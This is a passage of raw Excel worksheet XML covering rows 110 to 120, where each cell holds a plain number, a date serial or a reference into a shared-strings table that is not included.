      </c>
      <c r="C110" t="s">
        <v>157</v>
      </c>
      <c r="D110" t="s">
        <v>1010</v>
      </c>
      <c r="E110" t="s">
        <v>142</v>
      </c>
      <c r="F110" t="s">
        <v>1011</v>
      </c>
      <c r="G110" s="1">
        <v>43977</v>
      </c>
      <c r="H110">
        <v>2897</v>
      </c>
      <c r="I110">
        <v>2897</v>
      </c>
      <c r="J110">
        <v>3</v>
      </c>
      <c r="K110">
        <v>0</v>
      </c>
      <c r="L110">
        <v>1</v>
      </c>
      <c r="M110">
        <v>0</v>
      </c>
      <c r="N110">
        <v>5000</v>
      </c>
      <c r="O110">
        <v>0</v>
      </c>
      <c r="P110">
        <v>0</v>
      </c>
      <c r="Q110">
        <v>7</v>
      </c>
      <c r="R110">
        <v>8</v>
      </c>
      <c r="S110">
        <v>0</v>
      </c>
      <c r="T110">
        <v>1</v>
      </c>
      <c r="U110">
        <v>50</v>
      </c>
      <c r="V110">
        <v>0</v>
      </c>
      <c r="W110">
        <v>5000</v>
      </c>
      <c r="X110">
        <v>0</v>
      </c>
      <c r="Y110">
        <v>0</v>
      </c>
      <c r="Z110">
        <v>0</v>
      </c>
      <c r="AA110">
        <v>0</v>
      </c>
      <c r="AB110">
        <v>700</v>
      </c>
      <c r="AC110">
        <v>4000</v>
      </c>
      <c r="AD110">
        <v>0</v>
      </c>
      <c r="AE110">
        <v>1000</v>
      </c>
      <c r="AF110" t="s">
        <v>1012</v>
      </c>
      <c r="AG110">
        <v>61252</v>
      </c>
      <c r="AH110">
        <v>16</v>
      </c>
      <c r="AJ110">
        <v>242</v>
      </c>
      <c r="AK110" t="s">
        <v>706</v>
      </c>
      <c r="AL110" t="s">
        <v>706</v>
      </c>
      <c r="AM110" t="s">
        <v>1013</v>
      </c>
      <c r="AN110" t="s">
        <v>55</v>
      </c>
      <c r="AO110">
        <v>1997</v>
      </c>
      <c r="AP110">
        <v>318961241</v>
      </c>
      <c r="AQ110">
        <v>81335609999</v>
      </c>
      <c r="AR110" t="s">
        <v>1012</v>
      </c>
      <c r="AS110" t="s">
        <v>71</v>
      </c>
      <c r="AT110" t="s">
        <v>58</v>
      </c>
      <c r="AU110">
        <v>25</v>
      </c>
      <c r="AV110">
        <v>0</v>
      </c>
      <c r="AW110">
        <v>10</v>
      </c>
      <c r="AX110">
        <v>40</v>
      </c>
      <c r="AY110">
        <v>6</v>
      </c>
      <c r="AZ110">
        <v>5</v>
      </c>
      <c r="BA110" t="s">
        <v>17224</v>
      </c>
      <c r="BB110" t="s">
        <v>14418</v>
      </c>
      <c r="BC110">
        <v>0</v>
      </c>
      <c r="BD110" t="s">
        <v>9973</v>
      </c>
    </row>
    <row r="111" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A111">
        <v>515</v>
      </c>
      <c r="B111" t="s">
        <v>1014</v>
      </c>
      <c r="C111" t="s">
        <v>157</v>
      </c>
      <c r="D111" t="s">
        <v>1015</v>
      </c>
      <c r="E111" t="s">
        <v>623</v>
      </c>
      <c r="F111" t="s">
        <v>1016</v>
      </c>
      <c r="G111" s="1">
        <v>44369</v>
      </c>
      <c r="H111">
        <v>2905</v>
      </c>
      <c r="I111">
        <v>2905</v>
      </c>
      <c r="J111">
        <v>0</v>
      </c>
      <c r="K111">
        <v>1</v>
      </c>
      <c r="L111">
        <v>0</v>
      </c>
      <c r="M111">
        <v>0</v>
      </c>
      <c r="N111">
        <v>0</v>
      </c>
      <c r="O111">
        <v>0</v>
      </c>
      <c r="P111">
        <v>0</v>
      </c>
      <c r="Q111">
        <v>2</v>
      </c>
      <c r="R111">
        <v>0</v>
      </c>
      <c r="S111">
        <v>0</v>
      </c>
      <c r="T111">
        <v>0</v>
      </c>
      <c r="U111">
        <v>0</v>
      </c>
      <c r="V111">
        <v>1000</v>
      </c>
      <c r="W111">
        <v>0</v>
      </c>
      <c r="X111">
        <v>0</v>
      </c>
      <c r="Y111">
        <v>0</v>
      </c>
      <c r="Z111">
        <v>0</v>
      </c>
      <c r="AA111">
        <v>0</v>
      </c>
      <c r="AB111">
        <v>500</v>
      </c>
      <c r="AC111">
        <v>0</v>
      </c>
      <c r="AD111">
        <v>0</v>
      </c>
      <c r="AE111">
        <v>0</v>
      </c>
      <c r="AF111" t="s">
        <v>1017</v>
      </c>
      <c r="AG111">
        <v>69156</v>
      </c>
      <c r="AH111">
        <v>16</v>
      </c>
      <c r="AJ111">
        <v>253</v>
      </c>
      <c r="AK111" t="s">
        <v>1018</v>
      </c>
      <c r="AL111" t="s">
        <v>1019</v>
      </c>
      <c r="AM111" t="s">
        <v>1020</v>
      </c>
      <c r="AN111" t="s">
        <v>68</v>
      </c>
      <c r="AO111">
        <v>2009</v>
      </c>
      <c r="AP111">
        <v>817330298</v>
      </c>
      <c r="AQ111" t="s">
        <v>1021</v>
      </c>
      <c r="AR111" t="s">
        <v>1022</v>
      </c>
      <c r="AS111" t="s">
        <v>371</v>
      </c>
      <c r="AT111" t="s">
        <v>72</v>
      </c>
      <c r="AU111">
        <v>0</v>
      </c>
      <c r="AV111">
        <v>0</v>
      </c>
      <c r="AW111">
        <v>5</v>
      </c>
      <c r="AX111">
        <v>92</v>
      </c>
      <c r="AY111">
        <v>1</v>
      </c>
      <c r="AZ111">
        <v>0</v>
      </c>
      <c r="BA111">
        <v>0</v>
      </c>
      <c r="BB111">
        <v>0</v>
      </c>
      <c r="BC111">
        <v>0</v>
      </c>
      <c r="BD111">
        <v>0</v>
      </c>
    </row>
    <row r="112" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A112">
        <v>228</v>
      </c>
      <c r="B112" t="s">
        <v>1023</v>
      </c>
      <c r="C112" t="s">
        <v>157</v>
      </c>
      <c r="D112" t="s">
        <v>1024</v>
      </c>
      <c r="E112" t="s">
        <v>131</v>
      </c>
      <c r="F112" t="s">
        <v>819</v>
      </c>
      <c r="G112" s="1">
        <v>44081</v>
      </c>
      <c r="H112">
        <v>2929</v>
      </c>
      <c r="I112">
        <v>2929</v>
      </c>
      <c r="J112">
        <v>0</v>
      </c>
      <c r="K112">
        <v>0</v>
      </c>
      <c r="L112">
        <v>0</v>
      </c>
      <c r="M112">
        <v>0</v>
      </c>
      <c r="N112">
        <v>0</v>
      </c>
      <c r="O112">
        <v>0</v>
      </c>
      <c r="P112">
        <v>0</v>
      </c>
      <c r="Q112">
        <v>0</v>
      </c>
      <c r="R112">
        <v>0</v>
      </c>
      <c r="S112">
        <v>0</v>
      </c>
      <c r="T112">
        <v>1</v>
      </c>
      <c r="U112">
        <v>0</v>
      </c>
      <c r="V112">
        <v>0</v>
      </c>
      <c r="W112">
        <v>0</v>
      </c>
      <c r="X112">
        <v>0</v>
      </c>
      <c r="Y112">
        <v>0</v>
      </c>
      <c r="Z112">
        <v>0</v>
      </c>
      <c r="AA112">
        <v>0</v>
      </c>
      <c r="AB112">
        <v>0</v>
      </c>
      <c r="AC112">
        <v>0</v>
      </c>
      <c r="AD112">
        <v>0</v>
      </c>
      <c r="AE112">
        <v>300000</v>
      </c>
      <c r="AF112" t="s">
        <v>820</v>
      </c>
      <c r="AG112">
        <v>68472</v>
      </c>
      <c r="AH112">
        <v>16</v>
      </c>
      <c r="AJ112">
        <v>237</v>
      </c>
      <c r="AK112" t="s">
        <v>377</v>
      </c>
      <c r="AL112" t="s">
        <v>378</v>
      </c>
      <c r="AM112" t="s">
        <v>1025</v>
      </c>
      <c r="AN112" t="s">
        <v>55</v>
      </c>
      <c r="AO112">
        <v>1991</v>
      </c>
      <c r="AP112" t="s">
        <v>1026</v>
      </c>
      <c r="AQ112" t="s">
        <v>1027</v>
      </c>
      <c r="AR112" t="s">
        <v>823</v>
      </c>
      <c r="AS112" t="s">
        <v>71</v>
      </c>
      <c r="AT112" t="s">
        <v>58</v>
      </c>
      <c r="AU112">
        <v>0</v>
      </c>
      <c r="AV112">
        <v>0</v>
      </c>
      <c r="AW112">
        <v>10</v>
      </c>
      <c r="AX112">
        <v>0</v>
      </c>
      <c r="AY112">
        <v>3</v>
      </c>
      <c r="AZ112">
        <v>2</v>
      </c>
      <c r="BA112" t="s">
        <v>17282</v>
      </c>
      <c r="BB112" t="s">
        <v>14402</v>
      </c>
      <c r="BC112" t="s">
        <v>10705</v>
      </c>
      <c r="BD112" t="s">
        <v>10706</v>
      </c>
    </row>
    <row r="113" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A113">
        <v>583</v>
      </c>
      <c r="B113" t="s">
        <v>1028</v>
      </c>
      <c r="C113" t="s">
        <v>318</v>
      </c>
      <c r="D113" t="s">
        <v>1029</v>
      </c>
      <c r="E113" t="s">
        <v>142</v>
      </c>
      <c r="F113" t="s">
        <v>1030</v>
      </c>
      <c r="G113" s="1">
        <v>43952</v>
      </c>
      <c r="H113">
        <v>2937</v>
      </c>
      <c r="I113">
        <v>2937</v>
      </c>
      <c r="J113">
        <v>1</v>
      </c>
      <c r="K113">
        <v>0</v>
      </c>
      <c r="L113">
        <v>0</v>
      </c>
      <c r="M113">
        <v>0</v>
      </c>
      <c r="N113">
        <v>0</v>
      </c>
      <c r="O113">
        <v>0</v>
      </c>
      <c r="P113">
        <v>0</v>
      </c>
      <c r="Q113">
        <v>0</v>
      </c>
      <c r="R113">
        <v>0</v>
      </c>
      <c r="S113">
        <v>0</v>
      </c>
      <c r="T113">
        <v>0</v>
      </c>
      <c r="U113">
        <v>500</v>
      </c>
      <c r="V113">
        <v>0</v>
      </c>
      <c r="W113">
        <v>0</v>
      </c>
      <c r="X113">
        <v>0</v>
      </c>
      <c r="Y113">
        <v>0</v>
      </c>
      <c r="Z113">
        <v>0</v>
      </c>
      <c r="AA113">
        <v>0</v>
      </c>
      <c r="AB113">
        <v>0</v>
      </c>
      <c r="AC113">
        <v>0</v>
      </c>
      <c r="AD113">
        <v>0</v>
      </c>
      <c r="AE113">
        <v>0</v>
      </c>
      <c r="AF113" t="s">
        <v>1031</v>
      </c>
      <c r="AG113">
        <v>90926</v>
      </c>
      <c r="AH113">
        <v>26</v>
      </c>
      <c r="AJ113">
        <v>422</v>
      </c>
      <c r="AK113" t="s">
        <v>1032</v>
      </c>
      <c r="AL113" t="s">
        <v>1033</v>
      </c>
      <c r="AM113" t="s">
        <v>1034</v>
      </c>
      <c r="AN113" t="s">
        <v>68</v>
      </c>
      <c r="AO113">
        <v>2007</v>
      </c>
      <c r="AP113">
        <v>82347536904</v>
      </c>
      <c r="AQ113">
        <v>82347536904</v>
      </c>
      <c r="AR113" t="s">
        <v>1031</v>
      </c>
      <c r="AS113" t="s">
        <v>371</v>
      </c>
      <c r="AT113" t="s">
        <v>72</v>
      </c>
      <c r="AU113">
        <v>26</v>
      </c>
      <c r="AV113">
        <v>0</v>
      </c>
      <c r="AW113">
        <v>0</v>
      </c>
      <c r="AX113">
        <v>0</v>
      </c>
      <c r="AY113">
        <v>1</v>
      </c>
      <c r="AZ113">
        <v>4</v>
      </c>
      <c r="BA113" t="s">
        <v>17273</v>
      </c>
      <c r="BB113" t="s">
        <v>14694</v>
      </c>
      <c r="BC113">
        <v>0</v>
      </c>
      <c r="BD113" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="114" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A114">
        <v>374</v>
      </c>
      <c r="B114" t="s">
        <v>1035</v>
      </c>
      <c r="C114" t="s">
        <v>157</v>
      </c>
      <c r="D114" t="s">
        <v>1036</v>
      </c>
      <c r="E114" t="s">
        <v>412</v>
      </c>
      <c r="F114" t="s">
        <v>1037</v>
      </c>
      <c r="G114" s="1">
        <v>44070</v>
      </c>
      <c r="H114">
        <v>2953</v>
      </c>
      <c r="I114">
        <v>2953</v>
      </c>
      <c r="J114">
        <v>1</v>
      </c>
      <c r="K114">
        <v>2</v>
      </c>
      <c r="L114">
        <v>1</v>
      </c>
      <c r="M114">
        <v>0</v>
      </c>
      <c r="N114">
        <v>0</v>
      </c>
      <c r="O114">
        <v>0</v>
      </c>
      <c r="P114">
        <v>0</v>
      </c>
      <c r="Q114">
        <v>1</v>
      </c>
      <c r="R114">
        <v>0</v>
      </c>
      <c r="S114">
        <v>1</v>
      </c>
      <c r="T114">
        <v>1</v>
      </c>
      <c r="U114">
        <v>15000</v>
      </c>
      <c r="V114">
        <v>2</v>
      </c>
      <c r="W114">
        <v>500</v>
      </c>
      <c r="X114">
        <v>0</v>
      </c>
      <c r="Y114">
        <v>0</v>
      </c>
      <c r="Z114">
        <v>0</v>
      </c>
      <c r="AA114">
        <v>0</v>
      </c>
      <c r="AB114">
        <v>2000</v>
      </c>
      <c r="AC114">
        <v>0</v>
      </c>
      <c r="AD114">
        <v>1</v>
      </c>
      <c r="AE114">
        <v>2000</v>
      </c>
      <c r="AF114" t="s">
        <v>1038</v>
      </c>
      <c r="AG114">
        <v>62352</v>
      </c>
      <c r="AH114">
        <v>16</v>
      </c>
      <c r="AJ114">
        <v>250</v>
      </c>
      <c r="AK114" t="s">
        <v>1039</v>
      </c>
      <c r="AL114" t="s">
        <v>1040</v>
      </c>
      <c r="AM114" t="s">
        <v>1041</v>
      </c>
      <c r="AN114" t="s">
        <v>55</v>
      </c>
      <c r="AO114">
        <v>1989</v>
      </c>
      <c r="AP114" t="s">
        <v>1042</v>
      </c>
      <c r="AQ114" t="s">
        <v>1043</v>
      </c>
      <c r="AR114" t="s">
        <v>1044</v>
      </c>
      <c r="AS114" t="s">
        <v>71</v>
      </c>
      <c r="AT114" t="s">
        <v>58</v>
      </c>
      <c r="AU114">
        <v>25</v>
      </c>
      <c r="AV114">
        <v>1</v>
      </c>
      <c r="AW114">
        <v>32</v>
      </c>
      <c r="AX114">
        <v>149</v>
      </c>
      <c r="AY114">
        <v>16</v>
      </c>
      <c r="AZ114">
        <v>2</v>
      </c>
      <c r="BA114" t="s">
        <v>16677</v>
      </c>
      <c r="BB114" t="s">
        <v>14523</v>
      </c>
      <c r="BC114" t="s">
        <v>10910</v>
      </c>
      <c r="BD114" t="s">
        <v>9810</v>
      </c>
    </row>
    <row r="115" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A115">
        <v>771</v>
      </c>
      <c r="B115" t="s">
        <v>1045</v>
      </c>
      <c r="C115" t="s">
        <v>129</v>
      </c>
      <c r="D115" t="s">
        <v>1046</v>
      </c>
      <c r="E115" t="s">
        <v>142</v>
      </c>
      <c r="F115" t="s">
        <v>182</v>
      </c>
      <c r="G115" s="1">
        <v>44011</v>
      </c>
      <c r="H115">
        <v>2969</v>
      </c>
      <c r="I115">
        <v>2969</v>
      </c>
      <c r="J115">
        <v>1</v>
      </c>
      <c r="K115">
        <v>1</v>
      </c>
      <c r="L115">
        <v>0</v>
      </c>
      <c r="M115">
        <v>0</v>
      </c>
      <c r="N115">
        <v>0</v>
      </c>
      <c r="O115">
        <v>0</v>
      </c>
      <c r="P115">
        <v>0</v>
      </c>
      <c r="Q115">
        <v>0</v>
      </c>
      <c r="R115">
        <v>0</v>
      </c>
      <c r="S115">
        <v>0</v>
      </c>
      <c r="T115">
        <v>1</v>
      </c>
      <c r="U115">
        <v>1000000</v>
      </c>
      <c r="V115">
        <v>1000000</v>
      </c>
      <c r="W115">
        <v>0</v>
      </c>
      <c r="X115">
        <v>0</v>
      </c>
      <c r="Y115">
        <v>0</v>
      </c>
      <c r="Z115">
        <v>0</v>
      </c>
      <c r="AA115">
        <v>0</v>
      </c>
      <c r="AB115">
        <v>0</v>
      </c>
      <c r="AC115">
        <v>0</v>
      </c>
      <c r="AD115">
        <v>0</v>
      </c>
      <c r="AE115">
        <v>200000</v>
      </c>
      <c r="AF115" t="s">
        <v>1047</v>
      </c>
      <c r="AG115">
        <v>0</v>
      </c>
      <c r="AH115">
        <v>11</v>
      </c>
      <c r="AJ115">
        <v>270</v>
      </c>
      <c r="AK115" t="s">
        <v>1048</v>
      </c>
      <c r="AL115" t="s">
        <v>1049</v>
      </c>
      <c r="AM115" t="s">
        <v>1050</v>
      </c>
      <c r="AN115" t="s">
        <v>55</v>
      </c>
      <c r="AO115">
        <v>2017</v>
      </c>
      <c r="AP115" t="s">
        <v>1051</v>
      </c>
      <c r="AQ115" t="s">
        <v>1052</v>
      </c>
      <c r="AR115" t="s">
        <v>1052</v>
      </c>
      <c r="AS115" t="s">
        <v>179</v>
      </c>
      <c r="AT115" t="s">
        <v>58</v>
      </c>
      <c r="AU115">
        <v>26</v>
      </c>
      <c r="AV115">
        <v>1</v>
      </c>
      <c r="AW115">
        <v>15</v>
      </c>
      <c r="AX115">
        <v>2</v>
      </c>
      <c r="AY115">
        <v>2</v>
      </c>
      <c r="AZ115">
        <v>2</v>
      </c>
      <c r="BA115" t="s">
        <v>17310</v>
      </c>
      <c r="BB115" t="s">
        <v>14843</v>
      </c>
      <c r="BC115" t="s">
        <v>10778</v>
      </c>
      <c r="BD115" t="s">
        <v>10780</v>
      </c>
    </row>
    <row r="116" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A116">
        <v>625</v>
      </c>
      <c r="B116" t="s">
        <v>1053</v>
      </c>
      <c r="C116" t="s">
        <v>88</v>
      </c>
      <c r="D116" t="s">
        <v>1054</v>
      </c>
      <c r="E116" t="s">
        <v>1055</v>
      </c>
      <c r="F116" t="s">
        <v>1056</v>
      </c>
      <c r="G116" s="1">
        <v>43994</v>
      </c>
      <c r="H116">
        <v>2984</v>
      </c>
      <c r="I116">
        <v>2984</v>
      </c>
      <c r="J116">
        <v>1</v>
      </c>
      <c r="K116">
        <v>3</v>
      </c>
      <c r="L116">
        <v>3</v>
      </c>
      <c r="M116">
        <v>0</v>
      </c>
      <c r="N116">
        <v>0</v>
      </c>
      <c r="O116">
        <v>0</v>
      </c>
      <c r="P116">
        <v>5</v>
      </c>
      <c r="Q116">
        <v>0</v>
      </c>
      <c r="R116">
        <v>0</v>
      </c>
      <c r="S116">
        <v>1</v>
      </c>
      <c r="T116">
        <v>2</v>
      </c>
      <c r="U116">
        <v>1000000</v>
      </c>
      <c r="V116">
        <v>3</v>
      </c>
      <c r="W116">
        <v>12000</v>
      </c>
      <c r="X116">
        <v>0</v>
      </c>
      <c r="Y116">
        <v>0</v>
      </c>
      <c r="Z116">
        <v>0</v>
      </c>
      <c r="AA116">
        <v>70000</v>
      </c>
      <c r="AB116">
        <v>0</v>
      </c>
      <c r="AC116">
        <v>0</v>
      </c>
      <c r="AD116">
        <v>1</v>
      </c>
      <c r="AE116">
        <v>4000000</v>
      </c>
      <c r="AF116" t="s">
        <v>1057</v>
      </c>
      <c r="AG116">
        <v>82251</v>
      </c>
      <c r="AH116">
        <v>17</v>
      </c>
      <c r="AJ116">
        <v>274</v>
      </c>
      <c r="AK116" t="s">
        <v>1058</v>
      </c>
      <c r="AL116" t="s">
        <v>1059</v>
      </c>
      <c r="AM116" t="s">
        <v>1060</v>
      </c>
      <c r="AN116" t="s">
        <v>82</v>
      </c>
      <c r="AO116">
        <v>1978</v>
      </c>
      <c r="AP116">
        <v>36542500</v>
      </c>
      <c r="AQ116" t="s">
        <v>1061</v>
      </c>
      <c r="AR116" t="s">
        <v>1062</v>
      </c>
      <c r="AS116" t="s">
        <v>71</v>
      </c>
      <c r="AT116" t="s">
        <v>86</v>
      </c>
      <c r="AU116">
        <v>25</v>
      </c>
      <c r="AV116">
        <v>3</v>
      </c>
      <c r="AW116">
        <v>192</v>
      </c>
      <c r="AX116">
        <v>335</v>
      </c>
      <c r="AY116">
        <v>75</v>
      </c>
      <c r="AZ116">
        <v>26</v>
      </c>
      <c r="BA116" t="s">
        <v>17311</v>
      </c>
      <c r="BB116" t="s">
        <v>14729</v>
      </c>
      <c r="BC116" t="s">
        <v>10981</v>
      </c>
      <c r="BD116" t="s">
        <v>10983</v>
      </c>
    </row>
    <row r="117" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A117">
        <v>463</v>
      </c>
      <c r="B117" t="s">
        <v>1063</v>
      </c>
      <c r="C117" t="s">
        <v>157</v>
      </c>
      <c r="D117" t="s">
        <v>1064</v>
      </c>
      <c r="E117" t="s">
        <v>142</v>
      </c>
      <c r="F117" t="s">
        <v>151</v>
      </c>
      <c r="G117" s="1">
        <v>44237</v>
      </c>
      <c r="H117">
        <v>2993</v>
      </c>
      <c r="I117">
        <v>2993</v>
      </c>
      <c r="J117">
        <v>2</v>
      </c>
      <c r="K117">
        <v>0</v>
      </c>
      <c r="L117">
        <v>4</v>
      </c>
      <c r="M117">
        <v>0</v>
      </c>
      <c r="N117">
        <v>0</v>
      </c>
      <c r="O117">
        <v>0</v>
      </c>
      <c r="P117">
        <v>0</v>
      </c>
      <c r="Q117">
        <v>0</v>
      </c>
      <c r="R117">
        <v>0</v>
      </c>
      <c r="S117">
        <v>0</v>
      </c>
      <c r="T117">
        <v>0</v>
      </c>
      <c r="U117">
        <v>3000000</v>
      </c>
      <c r="V117">
        <v>0</v>
      </c>
      <c r="W117">
        <v>16</v>
      </c>
      <c r="X117">
        <v>0</v>
      </c>
      <c r="Y117">
        <v>0</v>
      </c>
      <c r="Z117">
        <v>0</v>
      </c>
      <c r="AA117">
        <v>0</v>
      </c>
      <c r="AB117">
        <v>0</v>
      </c>
      <c r="AC117">
        <v>0</v>
      </c>
      <c r="AD117">
        <v>0</v>
      </c>
      <c r="AE117">
        <v>0</v>
      </c>
      <c r="AF117" t="s">
        <v>1065</v>
      </c>
      <c r="AG117">
        <v>68421</v>
      </c>
      <c r="AH117">
        <v>16</v>
      </c>
      <c r="AJ117">
        <v>237</v>
      </c>
      <c r="AK117" t="s">
        <v>311</v>
      </c>
      <c r="AL117" t="s">
        <v>1066</v>
      </c>
      <c r="AM117" t="s">
        <v>1067</v>
      </c>
      <c r="AN117" t="s">
        <v>82</v>
      </c>
      <c r="AO117">
        <v>2010</v>
      </c>
      <c r="AP117">
        <v>333413883</v>
      </c>
      <c r="AQ117" t="s">
        <v>1068</v>
      </c>
      <c r="AR117" t="s">
        <v>1069</v>
      </c>
      <c r="AS117" t="s">
        <v>71</v>
      </c>
      <c r="AT117" t="s">
        <v>86</v>
      </c>
      <c r="AU117">
        <v>26</v>
      </c>
      <c r="AV117">
        <v>1</v>
      </c>
      <c r="AW117">
        <v>69</v>
      </c>
      <c r="AX117">
        <v>403</v>
      </c>
      <c r="AY117">
        <v>11</v>
      </c>
      <c r="AZ117">
        <v>17</v>
      </c>
      <c r="BA117" t="s">
        <v>16700</v>
      </c>
      <c r="BB117" t="s">
        <v>14595</v>
      </c>
      <c r="BC117" t="s">
        <v>12349</v>
      </c>
      <c r="BD117" t="s">
        <v>9518</v>
      </c>
    </row>
    <row r="118" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A118">
        <v>56</v>
      </c>
      <c r="B118" t="s">
        <v>1070</v>
      </c>
      <c r="C118" t="s">
        <v>99</v>
      </c>
      <c r="D118" t="s">
        <v>1071</v>
      </c>
      <c r="E118" t="s">
        <v>142</v>
      </c>
      <c r="F118" t="s">
        <v>1072</v>
      </c>
      <c r="G118" s="1">
        <v>44250</v>
      </c>
      <c r="H118">
        <v>3206</v>
      </c>
      <c r="I118">
        <v>3206</v>
      </c>
      <c r="J118">
        <v>1</v>
      </c>
      <c r="K118">
        <v>0</v>
      </c>
      <c r="L118">
        <v>1</v>
      </c>
      <c r="M118">
        <v>0</v>
      </c>
      <c r="N118">
        <v>0</v>
      </c>
      <c r="O118">
        <v>0</v>
      </c>
      <c r="P118">
        <v>0</v>
      </c>
      <c r="Q118">
        <v>0</v>
      </c>
      <c r="R118">
        <v>0</v>
      </c>
      <c r="S118">
        <v>0</v>
      </c>
      <c r="T118">
        <v>0</v>
      </c>
      <c r="U118">
        <v>800000</v>
      </c>
      <c r="V118">
        <v>0</v>
      </c>
      <c r="W118">
        <v>5000</v>
      </c>
      <c r="X118">
        <v>0</v>
      </c>
      <c r="Y118">
        <v>0</v>
      </c>
      <c r="Z118">
        <v>0</v>
      </c>
      <c r="AA118">
        <v>0</v>
      </c>
      <c r="AB118">
        <v>0</v>
      </c>
      <c r="AC118">
        <v>0</v>
      </c>
      <c r="AD118">
        <v>0</v>
      </c>
      <c r="AE118">
        <v>0</v>
      </c>
      <c r="AF118" t="s">
        <v>1073</v>
      </c>
      <c r="AG118">
        <v>11440</v>
      </c>
      <c r="AH118">
        <v>12</v>
      </c>
      <c r="AJ118">
        <v>160</v>
      </c>
      <c r="AK118" t="s">
        <v>114</v>
      </c>
      <c r="AL118" t="s">
        <v>114</v>
      </c>
      <c r="AM118" t="s">
        <v>1074</v>
      </c>
      <c r="AN118" t="s">
        <v>55</v>
      </c>
      <c r="AO118">
        <v>2011</v>
      </c>
      <c r="AP118" t="s">
        <v>1075</v>
      </c>
      <c r="AQ118" t="s">
        <v>1076</v>
      </c>
      <c r="AR118" t="s">
        <v>1077</v>
      </c>
      <c r="AS118" t="s">
        <v>71</v>
      </c>
      <c r="AT118" t="s">
        <v>58</v>
      </c>
      <c r="AU118">
        <v>25</v>
      </c>
      <c r="AV118">
        <v>1</v>
      </c>
      <c r="AW118">
        <v>33</v>
      </c>
      <c r="AX118">
        <v>0</v>
      </c>
      <c r="AY118">
        <v>2</v>
      </c>
      <c r="AZ118">
        <v>9</v>
      </c>
      <c r="BA118" t="s">
        <v>16597</v>
      </c>
      <c r="BB118" t="s">
        <v>14258</v>
      </c>
      <c r="BC118" t="s">
        <v>10031</v>
      </c>
      <c r="BD118">
        <v>0</v>
      </c>
    </row>
    <row r="119" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A119">
        <v>285</v>
      </c>
      <c r="B119" t="s">
        <v>1078</v>
      </c>
      <c r="C119" t="s">
        <v>157</v>
      </c>
      <c r="D119" t="s">
        <v>1079</v>
      </c>
      <c r="E119" t="s">
        <v>412</v>
      </c>
      <c r="F119" t="s">
        <v>1080</v>
      </c>
      <c r="G119" s="1">
        <v>44218</v>
      </c>
      <c r="H119">
        <v>3257</v>
      </c>
      <c r="I119">
        <v>3257</v>
      </c>
      <c r="J119">
        <v>2</v>
      </c>
      <c r="K119">
        <v>0</v>
      </c>
      <c r="L119">
        <v>1</v>
      </c>
      <c r="M119">
        <v>1</v>
      </c>
      <c r="N119">
        <v>0</v>
      </c>
      <c r="O119">
        <v>0</v>
      </c>
      <c r="P119">
        <v>0</v>
      </c>
      <c r="Q119">
        <v>0</v>
      </c>
      <c r="R119">
        <v>0</v>
      </c>
      <c r="S119">
        <v>0</v>
      </c>
      <c r="T119">
        <v>0</v>
      </c>
      <c r="U119">
        <v>14000</v>
      </c>
      <c r="V119">
        <v>0</v>
      </c>
      <c r="W119">
        <v>1000</v>
      </c>
      <c r="X119">
        <v>800</v>
      </c>
      <c r="Y119">
        <v>0</v>
      </c>
      <c r="Z119">
        <v>0</v>
      </c>
      <c r="AA119">
        <v>0</v>
      </c>
      <c r="AB119">
        <v>0</v>
      </c>
      <c r="AC119">
        <v>0</v>
      </c>
      <c r="AD119">
        <v>0</v>
      </c>
      <c r="AE119">
        <v>0</v>
      </c>
      <c r="AF119" t="s">
        <v>1081</v>
      </c>
      <c r="AG119">
        <v>67154</v>
      </c>
      <c r="AH119">
        <v>16</v>
      </c>
      <c r="AJ119">
        <v>241</v>
      </c>
      <c r="AK119" t="s">
        <v>539</v>
      </c>
      <c r="AL119" t="s">
        <v>1082</v>
      </c>
      <c r="AM119" t="s">
        <v>1083</v>
      </c>
      <c r="AN119" t="s">
        <v>82</v>
      </c>
      <c r="AO119">
        <v>1994</v>
      </c>
      <c r="AP119" t="s">
        <v>1084</v>
      </c>
      <c r="AQ119" t="s">
        <v>1085</v>
      </c>
      <c r="AR119" t="s">
        <v>1086</v>
      </c>
      <c r="AS119" t="s">
        <v>71</v>
      </c>
      <c r="AT119" t="s">
        <v>86</v>
      </c>
      <c r="AU119">
        <v>22</v>
      </c>
      <c r="AV119">
        <v>1</v>
      </c>
      <c r="AW119">
        <v>35</v>
      </c>
      <c r="AX119">
        <v>110</v>
      </c>
      <c r="AY119">
        <v>29</v>
      </c>
      <c r="AZ119">
        <v>36</v>
      </c>
      <c r="BA119" t="s">
        <v>16656</v>
      </c>
      <c r="BB119" t="s">
        <v>14454</v>
      </c>
      <c r="BC119">
        <v>0</v>
      </c>
      <c r="BD119" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="120" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A120">
        <v>800</v>
      </c>
      <c r="B120" t="s">
        <v>1087</v>
      </c>
      <c r="C120" t="s">
        <v>157</v>
      </c>
      <c r="D120" t="s">
        <v>1088</v>
      </c>
      <c r="E120" t="s">
        <v>300</v>
      </c>
      <c r="F120" t="s">
        <v>1089</v>
      </c>
      <c r="G120" s="1">
        <v>43977</v>
      </c>
      <c r="H120">
        <v>3268</v>
      </c>
      <c r="I120">
        <v>3268</v>
      </c>
      <c r="J120">
        <v>4</v>
      </c>
      <c r="K120">
        <v>2</v>
      </c>
      <c r="L120">
        <v>3</v>
      </c>
      <c r="M120">
        <v>2</v>
      </c>
      <c r="N120">
        <v>0</v>
      </c>
      <c r="O120">
        <v>0</v>
      </c>
      <c r="P120">
        <v>0</v>
      </c>
      <c r="Q120">
        <v>0</v>
      </c>
      <c r="R120">
        <v>0</v>
      </c>
      <c r="S120">
        <v>0</v>
      </c>
      <c r="T120">
        <v>0</v>
      </c>
      <c r="U120">
        <v>510000</v>
      </c>
      <c r="V120">
        <v>6000</v>
      </c>
      <c r="W120">
        <v>9000</v>
      </c>
      <c r="X120">
        <v>2000</v>
      </c>
      <c r="Y120">
        <v>0</v>
      </c>
      <c r="Z120">
        <v>0</v>
      </c>
      <c r="AA120">
        <v>0</v>
      </c>
      <c r="AB120">
        <v>0</v>
      </c>
      <c r="AC120">
        <v>0</v>
      </c>
      <c r="AD120">
        <v>0</v>
      </c>
      <c r="AE120">
        <v>0</v>
